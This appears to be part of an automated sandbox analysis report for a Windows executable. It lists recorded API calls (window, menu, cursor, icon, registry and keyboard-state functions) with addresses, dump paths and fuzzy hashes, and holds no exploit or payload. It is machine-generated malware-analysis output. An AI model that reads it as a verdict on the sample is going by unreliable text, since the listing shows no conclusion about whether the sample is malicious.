                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3869813825-0
                                                                                                                • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                                                • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                                                • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFreeMoveWindow
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 3474547544-1154884017
                                                                                                                • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                                                • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                                                • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                • GetFocus.USER32 ref: 004696E0
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                • Opcode ID: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                                • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                • Opcode Fuzzy Hash: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                                • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                Strings
                                                                                                                 Memory Dump Source
                                                                                                                 • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 Joe Sandbox IDA Plugin
                                                                                                                 • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1441871840-4108050209
                                                                                                                APIs
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 826844858-3440237614
                                                                                                                APIs
                                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                • String ID:
                                                                                                                • API String ID: 2632138820-0
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                Similarity
                                                                                                                • API ID: CursorLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 3238433803-0
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu$Sleep
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1196289194-4108050209
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromStringTask
                                                                                                                • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                • API String ID: 910554386-934586222
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00434585
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 3300687185-3887548279
                                                                                                                • Opcode ID: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                                • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                • Opcode Fuzzy Hash: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
                                                                                                                • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3412594756-0
                                                                                                                • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 1600147383-4113822522
                                                                                                                • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969911579-0
                                                                                                                • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                • DrawMenuBar.USER32 ref: 00455207
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 956284711-4108050209
                                                                                                                • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                APIs
                                                                                                                • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: FromQueryStringValue$CloseFreeLoadOpenTaskType
                                                                                                                • String ID: Version$\TypeLib$interface\
                                                                                                                • API String ID: 3215668907-939221531
                                                                                                                • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 1350042424-0
                                                                                                                • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
